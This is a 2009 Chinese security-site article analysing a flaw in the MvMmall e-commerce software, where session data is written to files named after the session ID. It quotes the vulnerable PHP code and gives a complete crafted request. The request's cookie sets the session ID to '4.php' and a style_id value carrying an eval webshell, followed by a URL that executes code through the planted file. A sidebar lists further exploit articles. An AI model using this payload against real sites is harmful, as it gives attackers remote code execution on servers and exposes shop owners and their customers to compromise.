MvMmall漏洞分析

		当前位置：主页>安全文章>文章资料>漏洞资料>文章内容

MvMmall漏洞分析

来源：http://www.t00ls.net/thread-3817-1-1.html 作者：Sobiny 发布时间：2009-12-17

经过分析。此程序的session的记录方式是通过 include/session.class.php文件。

此文件的 mvm_session 类的

   function handler(){ 
        session_module_name('user'); 
        session_set_save_handler( 
            array('mvm_session', 'open'), 
            array('mvm_session', 'close'), 
            array('mvm_session', 'read'), 
            array('mvm_session', 'write'), 
            array('mvm_session', 'destroy'), 
            array('mvm_session', 'gc') 
            ); 
    }

函数初始化并且定义了session 的各个方法。。
主要是说说write函数：

    function write($sid, $sess_data){ 
        global $sess_save_path, $sess_data_md5, $sess_save_name; 
        $sess_file = $sess_save_path . '/mvm_sess_' . $sid; 
        if($sess_data == ""){ 
            mvm_session::debug('不需写入', __line__); 
            return true; 
        } 
        if(md5($sess_data) == $sess_data_md5){ 
            mvm_session::debug('不需更新,数据没发生变化', __line__); 
            return touch($sess_file); 
        } 
        else{ 
            mvm_session::debug('写入的文件地址：' . $sess_file, __line__); 
            $sess_file_handle = fopen($sess_file, 'w'); 
            if($sess_file_handle){ 
                return fwrite($sess_file_handle, $sess_data); 
                fclose($sess_file_handle); 
            } 
            else
            { 
                return false; 
            } 
        } 
    } 
    只要我们控制了 $sid 和$sess_data的话。那么SHELL就能写进去了。 
  
    再看。header.php文件的 94行开始： 
        if($style_id){ 
        unset( $_SESSION['mvm_style_id']); 
        $_SESSION['mvm_style_id'] = $style_id; 
}elseif ($_SESSION['mvm_style_id']){ 
        $style_id = $_SESSION['mvm_style_id']; 
}else { 
        $style_id = $mm_default_style; 
}

这个 style_id 是由外部得来的。所以只要我们控制了style_id就可以把一个session的值改变。
于是构造封包：

GET /index.php HTTP/1.1 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */* 
Accept-Language: zh-cn 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; DomoloSNSBrowser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MAXTHON 2.0) 
Host: 127.0.0.1 
Connection: Keep-Alive 
Cache-Control: no-cache 
Cookie: PHPSESSID=4.php; mvmall_cart=1250187025_88060; style_id=%3C%3Feval%28%24%5FREQUEST%5Be%5D%29%3F%3E

在COOKIE里面。定义了style_id于是出现了文件:

1.

data\session\mvm_sess_4.php 内容：mvmmall_join|s:7:"mvmmall";mvm_style_id|s:22:"<?eval($_REQUEST[e])?>";sum_cart|a:2:{s:5:"price";s:7:"￥0.00";s:4:"nums";N;}

测试方式：http://127.0.0.1/data/session/mvm_sess_4.php?e=phpinfo();

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统致命漏洞。
·南方数据企业网站管理系统V10.0
·动网（DVBBS）Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码，常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day

推荐广告